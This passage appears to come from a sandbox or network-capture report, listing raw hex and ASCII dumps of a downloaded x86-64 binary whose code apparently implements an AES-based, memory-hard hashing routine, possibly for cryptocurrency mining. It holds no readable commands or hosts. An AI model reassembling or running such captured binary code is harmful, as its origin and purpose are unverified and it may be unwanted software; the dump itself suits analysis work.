                                                                                                                                                                                                                    Data Ascii: GG3AG3fA~AEE3fL~GG3AfAnAG3AEGG3AE3AEE3GE3fAnE3E3fL~E3fM~H$fAnAfM~L$fbfAnAfbflfD$0o$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4785INData Raw: 2b f3 45 0f 6f 22 66 0f 38 dc ec f3 44 0f 6f 1a 66 44 0f ef d5 66 44 0f d6 11 45 0f 12 d2 66 44 0f 7e d0 66 4d 0f 7e d0 66 45 0f 6f d1 c1 e8 18 66 45 0f 6f ce 41 8b 44 85 00 66 44 0f 38 dc cb 66 45 0f ef d1 4c 31 c0 48 89 41 08 66 44 0f d6 17 45 0f 12 d2 66 44 0f 7e d1 66 4c 0f 7e d0 66 45 0f 6f d0 c1 e9 18 66 45 0f 6f c5 41 8b 4c 8d 00 66 44 0f 38 dc c2 66 45 0f ef d0 48 31 c8 48 89 47 08 66 4c 0f 7e cf 66 44 0f d6 13 45 0f 12 d2 81 e7 f0 ff 1f 00 66 44 0f 7e d1 66 4c 0f 7e d0 66 44 0f 6f d7 48 01 f7 c1 e9 18 66 41 0f 6f fc 41 8b 4c 8d 00 66 0f 38 dc f9 66 44 0f ef d7 48 31 c8 48 89 43 08 66 4c 0f 7e c3 66 45 0f d6 12 45 0f 12 d2 81 e3 f0 ff 1f 00 66 44 0f 7e d1 66 4c 0f 7e d0 66 44 0f 6f d6 4c 01 f3 c1 e9 18 66 41 0f 6f f3 41 8b 4c 8d 00 66 0f 38 dc f0
                                                                                                                                                                                                                    Data Ascii: +Eo"f8DofDfDEfD~fM~fEofEoADfD8fEL1HAfDEfD~fL~fEofEoALfD8fEH1HGfL~fDEfD~fL~fDoHfAoALf8fDH1HCfL~fEEfD~fL~fDoLfAoALf8
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4801INData Raw: 81 c3 00 01 00 00 89 f6 45 0f b6 db 45 33 4c 9d 00 8b 94 24 d8 00 00 00 47 8b 5c 9d 00 44 33 5c b5 00 66 41 0f 6e c9 41 81 c0 00 01 00 00 45 33 1c be 45 33 5c 8d 00 4c 89 e1 66 41 0f 6e e3 41 33 54 85 00 48 83 f1 10 48 8b 7c 24 78 66 0f 62 cc 47 33 54 85 00 66 41 0f 7e c0 66 0f 6f e1 66 0f 6e ca 66 41 0f 6e ea 48 89 ca 4c 89 e1 48 01 fa 66 0f 62 cd 45 0f b6 d0 48 83 f1 20 f3 0f 6f 2a 66 0f 6c cc 48 89 c8 4c 89 e1 66 41 0f ef ca 49 89 fc 48 83 f1 30 48 01 f8 48 01 f9 f3 0f 6f 20 66 0f d4 31 66 41 0f d4 e2 0f 11 32 f3 0f 6f 74 24 40 48 8b 94 24 90 01 00 00 66 0f d4 ee 0f 11 28 66 0f 6f e8 0f 11 21 66 0f 6f e6 66 0f 6a e8 f3 0f 6f b4 24 90 00 00 00 66 0f ef e1 66 41 0f 7e e9 66 0f 7e e9 0f 11 22 66 0f 70 e0 55 41 c1 e9 10 0f b6 f1 66 0f 7e e3 66 0f 70 c0 ff
                                                                                                                                                                                                                    Data Ascii: EE3L$G\D3\fAnAE3E3\LfAnA3THH|$xfbG3TfA~fofnfAnHLHfbEH o*flHLfAIH0HHo f1fA2ot$@H$f(fo!fofjo$ffA~f~"fpUAf~fp
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4817INData Raw: 0f 6f 94 24 b0 00 00 00 49 89 c1 49 89 d2 48 89 d0 48 89 f2 4c 89 4c 24 70 48 83 f2 10 66 49 0f 6e c2 4c 8b 44 24 70 4c 89 8c 24 80 00 00 00 49 89 f1 48 83 f6 30 4c 01 f2 49 83 f1 20 4c 89 54 24 78 49 89 f2 48 8b b4 24 98 01 00 00 4d 01 f1 4d 01 f2 f3 41 0f 6f 09 0f 16 84 24 80 00 00 00 66 41 0f d4 12 66 0f ef 02 66 0f d4 44 24 30 4d 33 41 08 49 33 01 66 41 0f d4 cb 0f 11 12 41 0f 11 01 66 48 0f 6e c0 48 8b 94 24 60 01 00 00 41 0f 11 0a 66 49 0f 6e c8 49 ba 00 00 00 00 02 fc ff ff 66 0f 6c c1 44 8d 04 53 66 41 0f 28 ca 66 41 0f d4 c3 66 4c 0f 6e d9 48 89 d1 41 81 c8 01 00 00 80 66 44 0f 6c dc 0f 11 06 48 c1 e1 20 31 d2 48 8b 84 24 d0 00 00 00 66 44 0f ef d8 66 0f 6f c5 66 0f 73 d8 08 66 4c 0f 7e de 48 31 c1 66 48 0f 7e c0 48 33 8c 24 88 01 00 00 49 f7 f0
                                                                                                                                                                                                                    Data Ascii: o$IIHHLL$pHfInLD$pL$IH0LI LT$xIH$MMAo$fAffD$0M3AI3fAAfHnH$`AfInIflDSfA(fAfLnHAfDlH 1H$fDfofsfL~H1fH~H3$I
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4833INData Raw: 48 83 f1 20 48 33 bc 24 a0 02 00 00 44 89 84 24 30 01 00 00 44 8b 84 24 ac 02 00 00 4c 01 d1 49 f7 e3 f3 0f 6f 19 44 89 84 24 28 01 00 00 44 8b 84 24 a0 02 00 00 66 44 0f d4 fb 66 0f ef dd 44 89 84 24 34 01 00 00 44 8b 84 24 a4 02 00 00 48 89 44 24 70 44 89 84 24 38 01 00 00 49 89 f0 48 83 f6 30 4c 01 d6 49 83 f0 10 f3 44 0f 6f 0e 4d 01 d0 4c 8b 94 24 d0 00 00 00 f3 45 0f 6f 00 4c 33 94 24 a8 02 00 00 66 41 0f d4 f9 41 0f 11 38 66 41 0f 6f fa 44 8b 84 24 40 01 00 00 66 41 0f d4 f8 66 45 0f ef c1 66 41 0f 6f e8 0f 11 39 66 0f ef eb 44 0f 11 3e 66 49 0f 6e da 66 4c 0f 6e ff 44 8b 94 24 48 01 00 00 66 41 0f 6c df 66 4c 0f 6e fa 48 8b b4 24 08 01 00 00 44 0f 16 7c 24 70 66 44 0f d4 fb 66 49 0f 6e db 47 8d 1c 02 44 8b 84 24 50 01 00 00 44 8b 94 24 4c 01 00 00
                                                                                                                                                                                                                    Data Ascii: H H3$D$0D$LIoD$(D$fDfD$4D$HD$pD$8IH0LIDoML$EoL3$fAA8fAoD$@fAfEfAo9fD>fInfLnD$HfAlfLnH$D|$pfDfInGD$PD$L
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4849INData Raw: 4c 0f 6e d6 0f 11 bc 24 b0 00 00 00 f3 0f 7e 7a 60 4c 33 42 30 0f 11 bc 24 10 01 00 00 f3 0f 7e 7a 68 0f 11 bc 24 60 01 00 00 66 48 0f 6e f9 48 8b 4a 18 48 33 4a 38 66 48 0f 6e c9 66 44 0f 6c d7 66 49 0f 6e f8 48 8b 4a 48 4c 8b 42 40 48 33 4a 58 66 0f 6c f9 4c 33 42 50 66 48 0f 6e d1 0f 11 7c 24 40 48 8b 50 08 66 49 0f 6e f8 48 33 50 28 4c 8b 00 66 0f 6c fa 4c 33 40 20 48 8b 48 10 0f 11 bc 24 a0 00 00 00 f3 0f 7e 78 60 66 4d 0f 6e e8 4c 89 84 24 d8 00 00 00 0f 11 bc 24 20 01 00 00 f3 0f 7e 78 68 0f 11 bc 24 70 01 00 00 48 33 48 30 66 48 0f 6e fa 48 8b 50 18 48 33 50 38 66 4c 0f 6e e1 66 44 0f 6c ef 48 8b 48 40 66 48 0f 6e fa 48 33 48 50 48 8b 50 48 48 33 50 58 66 44 0f 6c e7 66 48 0f 6e f9 b9 00 04 00 00 66 48 0f 6e da 66 0f 6c fb 0f 11 bc 24 90 00 00 00
                                                                                                                                                                                                                    Data Ascii: Ln$~z`L3B0$~zh$`fHnHJH3J8fHnfDlfInHJHLB@H3JXflL3BPfHn|$@HPfInH3P(LflL3@ HH$~x`fMnL$$ ~xh$pH3H0fHnHPH3P8fLnfDlHH@fHnH3HPHPHH3PXfDlfHnfHnfl$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4865INData Raw: 24 20 03 00 00 44 0f b6 9c 24 4e 03 00 00 0f 11 94 24 10 03 00 00 0f b6 bc 24 1c 03 00 00 43 33 84 9f 00 08 00 00 66 41 0f 7e db 66 0f 70 da 55 44 31 d8 41 89 db 66 0f 6a d2 41 c1 eb 18 43 33 84 9f 00 0c 00 00 49 89 c3 49 c1 e3 20 4d 09 da 66 41 0f 7e db 66 41 0f 6f d9 41 31 c3 4c 89 54 24 40 0f b6 84 24 2d 03 00 00 66 41 0f 6a d9 44 0f b6 94 24 38 03 00 00 47 8b 14 97 45 33 94 87 00 04 00 00 66 0f 7e d8 66 41 0f 70 d9 ff 41 31 c2 89 d8 0f b6 df c1 e8 10 48 63 db 0f b6 c0 45 33 94 87 00 08 00 00 44 89 d8 c1 e8 18 45 33 94 87 00 0c 00 00 44 89 d0 48 09 c6 41 c1 eb 10 66 0f 7e d8 41 33 04 bf 45 0f b6 db 41 33 84 9f 00 04 00 00 89 f6 43 33 84 9f 00 08 00 00 66 41 0f 7e d3 66 0f 7e cb 45 31 d3 66 41 0f 6f d6 41 c1 eb 18 43 33 84 9f 00 0c 00 00 48 c1 e0 20 48
                                                                                                                                                                                                                    Data Ascii: $ D$N$$C3fA~fpUD1AfjAC3II MfA~fAoA1LT$@$-fAjD$8GE3f~fApA1HcE3DE3DHAf~A3EA3C3fA~f~E1fAoAC3H H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4881INData Raw: d6 48 89 cb 4c 8b 07 4c 89 4c 24 60 41 b9 c8 00 00 00 e8 14 7d b4 ff 4c 8b 47 08 48 8d 0c 33 89 f2 41 b9 c8 00 00 00 48 89 fb e8 fc 7c b4 ff 48 8b 4f 08 48 8b 07 f3 44 0f 7e 41 60 48 89 4c 24 70 f3 0f 7e 79 68 48 8b b9 e0 00 00 00 b9 00 04 00 00 48 89 44 24 68 48 8b b0 e0 00 00 00 f3 44 0f 7e 48 60 f3 0f 7e 70 68 e8 2d af f6 ff 48 8b 0b 48 8b 53 08 80 3d 8f 16 32 00 00 c6 81 b0 01 00 00 01 c6 82 b0 01 00 00 01 0f 84 ae 05 00 00 41 b9 01 00 00 00 41 b8 00 00 04 00 e8 aa c1 c5 ff 48 8b 5c 24 68 48 8b 4c 24 70 4c 8d ac 24 88 00 00 00 48 c7 44 24 58 00 00 01 00 4c 89 6c 24 48 66 45 0f ef f6 48 8b 43 08 48 33 43 28 4c 8b 1b 4c 8b 11 48 89 44 24 38 48 8b 41 08 48 33 41 28 4c 33 5b 20 4c 33 51 20 48 89 44 24 30 48 8b 43 10 48 33 43 30 66 48 0f 6e e0 48 8b 43 18
                                                                                                                                                                                                                    Data Ascii: HLLL$`A}LGH3AH|HOHD~A`HL$p~yhHHD$hHD~H`~ph-HHS=2AAH\$hHL$pL$HD$XLl$HfEHCH3C(LLHD$8HAH3A(L3[ L3Q HD$0HCH3C0fHnHC
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4897INData Raw: ff ff 48 8b 7c 24 70 48 8d 1d 3d d2 1a 00 48 8b 0f e8 25 be c4 ff 48 8b 4f 08 e8 1c be c4 ff 48 8b 8c 24 80 00 00 00 ba 18 00 00 00 e8 7a 36 b4 ff 48 8b 8c 24 88 00 00 00 ba 18 00 00 00 e8 68 36 b4 ff 48 8b 0f 48 8b 74 24 78 ba c8 00 00 00 0f b6 01 49 89 f0 83 e0 03 ff 14 c3 48 8b 4f 08 4c 8d 46 20 ba c8 00 00 00 0f b6 01 83 e0 03 48 8b 04 c3 48 81 c4 98 00 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f 48 ff e0 49 c7 00 00 00 00 00 49 c7 40 08 00 00 00 00 49 c7 40 10 00 00 00 00 49 c7 40 18 00 00 00 00 49 c7 40 20 00 00 00 00 49 c7 40 28 00 00 00 00 49 c7 40 30 00 00 00 00 49 c7 40 38 00 00 00 00 48 81 c4 98 00 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 68 80 3d 0a d6
                                                                                                                                                                                                                    Data Ascii: H|$pH=H%HOH$z6H$h6HHt$xIHOLF HH[^_]A\A]A^A_HII@I@I@I@ I@(I@0I@8H[^_]A\A]A^A_AWAVAUATUWVSHh=
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4913INData Raw: 48 c7 44 24 68 00 00 08 00 48 89 44 24 28 48 8b 06 48 8d 8d 00 08 00 00 48 33 46 20 49 89 c7 48 8b 47 08 48 33 47 28 48 89 44 24 30 48 8b 46 08 48 33 46 28 48 89 44 24 40 48 8b 47 10 48 33 47 30 66 48 0f 6e e0 48 8b 47 18 48 33 47 38 48 8d b9 00 fc ff ff 66 48 0f 6e d8 48 8b 46 10 48 33 46 30 66 0f 6c e3 66 48 0f 6e d8 48 8b 46 18 48 33 46 38 66 48 0f 6e c8 66 0f 6c d9 0f 1f 80 00 00 00 00 48 8b 74 24 28 f3 0f 7e 54 24 28 81 e6 f0 ff 1f 00 48 03 74 24 48 0f 16 54 24 30 8b 46 08 8b 56 04 8b 1e 44 8b 46 0c 89 44 24 3c 44 0f b6 e8 c1 e8 10 44 0f b6 e2 44 0f b6 d0 0f b6 c6 44 0f b6 db 45 0f b6 f0 41 89 c1 8b 44 24 3c 46 8b 14 91 46 33 14 8f 46 33 54 9d 00 45 89 c3 41 c1 eb 10 0f b6 c4 41 89 c1 45 0f b6 db 44 89 c0 41 c1 e8 18 46 8b 1c 99 46 33 1c 8f 41 89 d9
                                                                                                                                                                                                                    Data Ascii: HD$hHD$(HHH3F IHGH3G(HD$0HFH3F(HD$@HGH3G0fHnHGH3G8HfHnHFH3F0flfHnHFH3F8fHnflHt$(~T$(Ht$HT$0FVDFD$<DDDDEAD$<FF3F3TEAAEDAFF3A
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4929INData Raw: 0f d4 d9 66 45 0f ef c8 44 0f 11 19 48 8b 4c 24 58 66 41 0f ef d1 66 0f ef d1 66 0f 6f c8 48 89 ca 66 0f ef ca 66 48 0f 7e d3 48 89 c8 48 83 f1 30 0f 11 4d 00 48 83 f2 10 48 83 f0 20 48 01 f1 48 01 f2 48 01 f0 81 e3 f0 ff 1f 00 f3 0f 6f 09 f3 44 0f 6f 12 4d 8d 64 1d 00 f3 44 0f 6f 08 66 44 0f 6f d9 66 41 0f ef ca 66 44 0f d4 dc 44 0f 11 1a 66 45 0f 6f da 66 44 0f d4 de 44 0f 11 18 66 44 0f 6f df 66 45 0f d4 d9 66 44 0f ef cf 66 41 0f ef c9 44 0f 11 19 44 8b 54 24 68 44 8b 4c 24 60 66 0f ef cb 66 0f 6f de 48 8b 8c 24 b0 00 00 00 66 0f 7e 84 24 e8 00 00 00 66 0f ef d9 43 8d 34 0a 44 8b 54 24 6c 44 8b 4c 24 70 0f 11 1f 49 8b 54 24 08 66 0f 6f dd 48 c1 e6 20 43 8d 04 0a 44 8b 54 24 40 44 8b 4c 24 50 66 0f 73 db 08 48 89 54 24 58 48 09 c6 49 33 34 24 48 8b 94
                                                                                                                                                                                                                    Data Ascii: fEDHL$XfAffoHffH~HH0MHH HHHoDoMdDofDofAfDDfEofDDfDofEfDfADDT$hDL$`ffoH$f~$fC4DT$lDL$pIT$foH CDT$@DL$PfsHT$XHI34$H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4945INData Raw: 41 31 c1 44 89 e8 4c 63 ea c1 e8 10 66 0f 7e ca 0f b6 c0 44 33 8c 81 00 08 00 00 44 89 d0 41 c1 ea 10 c1 e8 18 45 0f b6 d2 44 33 8c 81 00 0c 00 00 44 89 c8 49 09 c6 66 0f 7e d0 42 33 04 b9 42 33 84 a9 00 04 00 00 42 33 84 91 00 08 00 00 66 41 0f 7e c2 45 89 f6 45 31 ca 66 0f 6f c4 41 c1 ea 18 42 33 84 91 00 0c 00 00 48 c1 e0 20 49 09 c6 c1 ea 18 66 48 0f 7e c8 41 89 d1 4c 89 74 24 38 f3 0f 6f 64 24 30 47 8b 0c 8c 48 8b 54 24 50 66 0f ef c4 49 31 c1 4d 89 48 08 66 0f d6 02 0f 12 c0 66 41 0f 7e c0 66 48 0f 7e c0 41 c1 e8 18 47 8b 04 84 49 31 c0 66 48 0f 7e e8 4c 89 42 08 66 49 0f 7e e8 41 81 e0 f0 ff 3f 00 49 01 f8 4d 8b 10 4d 8b 68 08 49 f7 e2 49 89 c6 48 8b 44 24 60 4c 01 da 49 89 d3 49 89 10 4c 01 f0 49 31 c3 4c 33 5c 24 68 49 31 c5 4c 8b 4c 24 48 4d 89
                                                                                                                                                                                                                    Data Ascii: A1DLcf~D3DAED3DIf~B3B3B3fA~EE1foAB3H IfH~ALt$8od$0GHT$PfI1MHffA~fH~AGI1fH~LBfI~A?IMMhIIHD$`LIILI1L3\$hI1LL$HM
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4961INData Raw: 8b 0e e8 c4 cc c3 ff 48 8b 4c 24 38 ba 18 00 00 00 e8 95 36 b3 ff 48 8b 0e 4c 8b 44 24 40 48 8d 15 26 d2 19 00 0f 10 74 24 50 0f 10 7c 24 60 0f b6 01 83 e0 03 48 8b 04 c2 ba c8 00 00 00 48 83 c4 78 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f 48 ff e0 90 90 90 90 90 90 90 90 90 90 41 57 41 56 41 54 55 57 56 53 48 83 ec 20 4c 89 cb 4c 89 c6 41 b9 c8 00 00 00 4c 8b 03 e8 ae 3c b3 ff 48 8b 0b e8 26 d8 c2 ff 4c 8b 23 41 ba 00 00 10 00 49 8b 54 24 10 49 8b 44 24 18 49 33 54 24 30 49 33 44 24 38 66 48 0f 6e c2 66 48 0f 6e e0 4d 8b 04 24 4d 8b 9c 24 e0 00 00 00 4d 8b 4c 24 08 4d 33 44 24 20 66 0f 6c c4 4d 33 4c 24 28 4c 89 c0 66 0f 6f c8 66 49 0f 6e d0 25 f0 ff 1f 00 66 49 0f 6e d9 4c 01 d8 66 0f 6c d3 f3 0f 6f 00 66 0f 38 dc c2 66 48 0f 7e c1 66 0f ef c8 81 e1 f0 ff 1f
                                                                                                                                                                                                                    Data Ascii: HL$86HLD$@H&t$P|$`HHx[^_]A\A]A^A_HAWAVATUWVSH LLAL<H&L#AIT$ID$I3T$0I3D$8fHnfHnM$M$ML$M3D$ flM3L$(LfofIn%fInLflof8fH~f
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4977INData Raw: b9 c8 00 00 00 4c 8b 03 e8 1e fd b2 ff 48 8b 0b e8 f6 7f c2 ff 4c 8b 23 41 ba 00 00 04 00 49 8b 44 24 10 49 8b 54 24 18 49 33 44 24 30 49 33 54 24 38 4d 8b 04 24 66 48 0f 6e c0 4d 33 44 24 20 66 48 0f 6e e2 4d 8b 9c 24 e0 00 00 00 4d 8b 4c 24 08 66 0f 6c c4 4c 89 c1 4d 33 4c 24 28 0f 1f 44 00 00 81 e1 f0 ff 3f 00 66 0f 6f c8 66 49 0f 6e d0 4c 01 d9 66 49 0f 6e d9 f3 0f 6f 01 66 0f 6c d3 66 0f 38 dc c2 66 0f ef c8 66 48 0f 7e c0 0f 11 09 66 48 0f 7e c1 81 e1 f0 ff 3f 00 4c 01 d9 48 8b 39 48 8b 69 08 48 f7 e7 4c 01 c2 49 89 c5 48 89 11 48 31 fa 4b 8d 44 0d 00 48 89 d7 48 89 41 08 48 31 e8 49 89 d0 81 e7 f0 ff 3f 00 49 89 c1 4c 01 df 48 8b 2f 48 63 4f 08 49 89 cd 49 83 cd 05 48 89 e8 48 99 49 f7 fd 48 31 c5 48 31 c1 48 89 2f 49 83 ea 01 0f 85 65 ff ff ff 4c
                                                                                                                                                                                                                    Data Ascii: LHL#AID$IT$I3D$0I3T$8M$fHnM3D$ fHnM$ML$flLM3L$(D?fofInLfInoflf8ffH~fH~?LH9HiHLIHH1KDHHAH1I?ILH/HcOIIHHIH1H1H/IeL
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4993INData Raw: 66 45 0f 7e d9 f3 41 0f 6f 06 66 44 0f 7e e2 66 45 0f 6f e3 41 0f b6 f1 66 45 0f 6a e3 66 45 0f 70 db ff 44 0f b6 e2 66 44 0f 7e e0 66 45 0f 7e e3 66 44 0f 7e db 66 44 0f 7e 64 24 20 44 0f b6 e8 41 c1 eb 10 0f b6 c6 41 89 c2 45 0f b6 db 8b 44 24 20 46 8b 1c 99 47 33 1c 97 45 33 1c b0 66 44 0f 7e de 0f b6 c4 c1 ee 10 41 89 c2 0f b6 c7 40 0f b6 f6 8b 34 b1 43 33 34 97 41 89 c2 44 89 c8 43 33 34 a0 45 89 cc 0f b6 c4 47 8b 14 97 41 c1 ec 10 41 c1 e9 18 45 0f b6 e4 41 81 c1 00 01 00 00 46 33 14 a1 41 89 d4 47 33 14 a8 41 89 c5 8b 44 24 20 41 c1 ec 10 c1 ea 18 42 33 34 89 45 0f b6 e4 81 c2 00 01 00 00 66 44 0f 6e ee c1 e8 18 46 8b 24 a1 47 33 24 af 44 0f b6 eb 05 00 01 00 00 c1 eb 18 44 33 14 91 47 33 24 a8 81 c3 00 01 00 00 44 33 24 81 66 45 0f 6e da 44 33 1c
                                                                                                                                                                                                                    Data Ascii: fE~AofD~fEoAfEjfEpDfD~fE~fD~fD~d$ DAAED$ FG3E3fD~A@4C34ADC34EGAAEAF3AG3AD$ AB34EfDnF$G3$DD3G3$D3$fEnD3
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5009INData Raw: 2a 0f 86 cc 03 00 00 4c 89 4c 24 28 41 89 d6 48 89 cd 4d 8d 69 18 4c 89 cb 4c 8b 03 48 89 e9 41 b9 c8 00 00 00 44 89 f2 48 83 c3 08 48 01 f5 e8 f7 7c b2 ff 48 8b 4b f8 c6 81 b0 01 00 00 01 e8 87 6c c2 ff 49 39 dd 75 d0 4d 8b 14 24 49 8b 44 24 08 48 8d 2d f2 0d 19 00 4d 8b 44 24 10 41 bc 00 00 02 00 49 8b 52 08 49 33 52 28 66 48 0f 6e fa 4d 8b 1a 49 8b 52 10 4d 33 5a 20 49 33 52 30 66 48 0f 6e e2 66 49 0f 6e db 49 8b 52 18 4c 8b 08 49 33 52 38 66 0f 6c df 4c 33 48 20 66 48 0f 6e fa 48 8b 50 08 48 33 50 28 66 49 0f 6e d1 66 0f 6c e7 66 48 0f 6e fa 48 8b 50 10 48 33 50 30 66 48 0f 6e f2 48 8b 50 18 48 33 50 38 66 0f 6c d7 49 8b 48 08 66 48 0f 6e fa 49 33 48 28 49 8b 10 66 0f 6c f7 49 33 50 20 66 48 0f 6e f9 49 8b 48 10 49 33 48 30 66 48 0f 6e ca 66 48 0f 6e
                                                                                                                                                                                                                    Data Ascii: *LL$(AHMiLLHADHH|HKlI9uM$ID$H-MD$AIRI3R(fHnMIRM3Z I3R0fHnfInIRLI3R8flL3H fHnHPH3P(fInflfHnHPH3P0fHnHPH3P8flIHfHnI3H(IflI3P fHnIHI3H0fHnfHn
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5025INData Raw: 14 a8 0f b6 ec 8b 44 24 20 c1 ef 10 89 ed 40 0f b6 ff 81 c2 00 01 00 00 c1 e8 18 8b 3c b9 41 33 3c af 0f b6 eb 05 00 01 00 00 44 33 14 91 41 33 3c a8 c1 eb 18 33 3c 81 81 c3 00 01 00 00 66 45 0f 6e fa 66 44 0f 6e f7 44 33 1c 99 66 41 0f 7e c9 66 45 0f 62 fe 66 45 0f 6e f3 66 4c 0f 7e fb 66 44 0f 6e fe 41 0f b6 f1 66 45 0f 62 f7 66 4c 0f 6e fb 66 45 0f 6c f7 66 45 0f 6f fb 66 45 0f 6f de 66 44 0f 70 f1 55 66 44 0f 7e f2 66 44 0f 6f f1 66 45 0f ef d8 66 44 0f 6a f1 66 45 0f ef fb 66 0f 70 c9 ff 0f b6 fa 66 44 0f 7e f0 66 45 0f 7e f3 45 0f 11 7d 00 66 0f 7e cb 0f b6 e8 41 c1 eb 10 0f b6 c6 44 0f b6 eb 41 89 c2 45 0f b6 db 66 44 0f 7e 74 24 20 46 8b 1c 99 47 33 1c 97 45 33 1c b0 8b 44 24 20 66 0f 7e ce c1 ee 10 0f b6 c4 40 0f b6 f6 41 89 c2 8b 34 b1 44 89 c8
                                                                                                                                                                                                                    Data Ascii: D$ @<A3<D3A3<3<fEnfDnD3fA~fEbfEnfL~fDnAfEbfLnfElfEofEofDpUfD~fDofEfDjfEfpfD~fE~E}f~ADAEfD~t$ FG3E3D$ f~@A4D
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5041INData Raw: f8 48 29 f9 83 c1 60 c1 e9 03 f3 48 ab e9 72 ff ff ff 90 90 90 90 90 90 90 90 90 41 57 41 56 41 55 41 54 55 57 56 53 48 81 ec a8 01 00 00 0f 11 b4 24 00 01 00 00 0f 11 bc 24 10 01 00 00 44 0f 11 84 24 20 01 00 00 44 0f 11 8c 24 30 01 00 00 44 0f 11 94 24 40 01 00 00 44 0f 11 9c 24 50 01 00 00 44 0f 11 a4 24 60 01 00 00 44 0f 11 ac 24 70 01 00 00 44 0f 11 b4 24 80 01 00 00 44 0f 11 bc 24 90 01 00 00 48 89 d5 4c 89 cf 41 89 d5 48 89 ce 4c 89 84 24 00 02 00 00 4d 8d 61 18 4c 89 cb 4c 89 8c 24 e8 00 00 00 4c 8b 03 48 89 f1 41 b9 c8 00 00 00 44 89 ea 48 83 c3 08 48 01 ee e8 67 fc b1 ff 48 8b 4b f8 e8 de 97 c1 ff 49 39 dc 75 d7 48 8b 0f 48 8b 57 10 66 45 0f ef e4 48 8b 47 08 f3 0f 7e 41 60 4c 8b 41 08 4c 33 41 28 f3 0f 7e 49 68 0f 11 44 24 30 66 49 0f 6e c0 4c
                                                                                                                                                                                                                    Data Ascii: H)`HrAWAVAUATUWVSH$$D$ D$0D$@D$PD$`D$pD$D$HLAHL$MaLL$LHADHHgHKI9uHHWfEHG~A`LAL3A(~IhD$0fInL
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5057INData Raw: 89 54 24 38 48 8b 54 24 38 49 89 c6 48 8b 44 24 30 66 48 0f 6e da 4d 01 fe 48 89 84 24 d8 00 00 00 48 89 d8 48 83 f3 30 48 83 f0 20 4c 01 fb 48 89 c2 66 44 0f d4 0b 48 8b 44 24 30 4c 01 fa 0f 16 9c 24 d8 00 00 00 66 41 0f ef 1e 49 bf 00 00 00 00 02 fc ff ff f3 0f 6f 22 4c 33 0a 48 33 42 08 66 41 0f d4 db 45 0f 11 0e 49 be 01 00 00 00 02 fc ff ff 66 41 0f d4 e0 0f 11 1a 66 49 0f 6e d9 66 45 0f 6f cb 0f 11 23 66 48 0f 6e e0 66 0f 6c dc 66 48 0f 6e e7 66 41 0f d4 d8 41 0f 11 1c 24 48 8b 94 24 90 00 00 00 48 8b 44 24 60 0f 16 a4 24 b8 00 00 00 66 0f ef e3 66 0f 6f d8 48 89 d3 45 8d 0c 50 31 d2 48 c1 e3 20 66 0f 73 db 08 66 44 0f 6f c4 41 81 c9 01 00 00 80 48 31 c3 66 48 0f 7e d8 66 49 0f 7e e4 48 33 9c 24 c0 00 00 00 49 f7 f1 48 c1 e2 20 89 c0 48 01 c2 66 48
                                                                                                                                                                                                                    Data Ascii: T$8HT$8IHD$0fHnMH$HH0H LHfDHD$0L$fAIo"L3H3BfAEIfAfInfEo#fHnflfHnfAA$H$HD$`$ffoHEP1H fsfDoAH1fH~fI~H3$IH HfH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC5073INData Raw: 0f 6e f1 48 8b 50 48 48 8b 48 40 4c 89 44 24 28 66 44 0f 6c f1 48 33 48 50 48 33 50 58 0f 11 b4 24 a0 00 00 00 66 49 0f 6e f0 66 4c 0f 6e e9 66 48 0f 6e d2 b9 00 04 00 00 66 0f 6c f0 66 44 0f 6c ea e8 54 af f3 ff 48 8d 84 24 f8 00 00 00 4c 8b 44 24 28 49 89 d9 48 89 84 24 b0 00 00 00 48 8d 84 24 f0 00 00 00 48 89 44 24 48 48 8b 44 24 40 48 c7 84 24 e0 00 00 00 00 00 06 00 4c 89 7c 24 28 eb 19 0f 1f 80 00 00 00 00 66 44 0f 6f d0 66 44 0f 6f d9 66 44 0f 6f f2 4c 89 f0 48 8b 4c 24 28 4d 89 e3 41 81 e0 f0 ff 1f 00 48 8b 7c 24 20 41 81 e3 f0 ff 1f 00 4a 8d 1c 00 41 81 e1 f0 ff 1f 00 4e 8d 34 19 f3 0f 6f 13 48 89 9c 24 b8 00 00 00 4e 8d 3c 0f f3 41 0f 6f 0e f3 41 0f 6f 07 66 0f 70 d9 55 66 41 0f 7e ca 66 0f 7e db 66 0f 6f d9 41 0f b6 ea 66 0f 6a d9 66 0f 70 c9
                                                                                                                                                                                                                    Data Ascii: nHPHHH@LD$(fDlH3HPH3PX$fInfLnfHnflfDlTH$LD$(IH$H$HD$HHD$@H$L|$(fDofDofDoLHL$(MAH|$ AJAN4oH$N<AoAofpUfA~f~foAfjfp
